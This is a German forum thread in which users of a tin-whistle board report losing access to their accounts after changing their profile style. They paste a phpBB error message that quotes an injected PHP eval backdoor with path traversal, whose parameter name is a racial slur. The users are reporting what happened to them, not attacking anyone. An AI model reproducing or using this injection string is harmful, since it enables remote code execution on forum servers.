An den Admin :)

Einfach nur Quatschen? Allgemeine Diskussionen zu verschiedenen Themen? Hier ist das richtige Podium für alle Themen, die woanders nichts zu suchen haben.
Antworten
Philipp
Beiträge: 4
Registriert: Di Aug 01, 2006 5:47 pm

An den Admin :)

Beitrag von Philipp »

Hallo :)
ich musste mich leider 2x anmelden. Meine erste Anmeldung, Benutzer "edlin" funktioniert nicht mehr. Das Style wurde unter Profile auf "black" geändert, seitdem erhalte ich mit dem Benutzerprofil nach Login folgende Fehlermeldung:


phpBB : Critical Error

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 390
File : functions.php



Ich dachte mir, vielleicht könnte das jemanden interessieren, bevor auch andere in die Falle tappen.

Viele Grüße :)
Philipp
admin
Site Admin
Beiträge: 184
Registriert: Do Jan 29, 2004 9:48 pm
Kontaktdaten:

Beitrag von admin »

Hallo Philipp,

vielen Dank für Deinen Hinweis. Werde mich sofort darum kümmern.

Viele Grüße
Das Tinwhistle-Team
Benutzeravatar
Maga
Beiträge: 1
Registriert: Mi Feb 20, 2008 8:30 pm
Wohnort: Bayern
Kontaktdaten:

Beitrag von Maga »

Hallo
Ich hätte das hier früher lesen sollen! :cry:
Mir ist gestern das gleiche passiert als ich den Style geändert habe. Habe auch die Fehlermeldung bekommen und musste mich nochmal anmelden. In meine erste Anmeldung "Cobi" komme ich leider nicht mehr rein! :(

Egal, jetzt bin ich eine Erfahrung schlauer :D
Antworten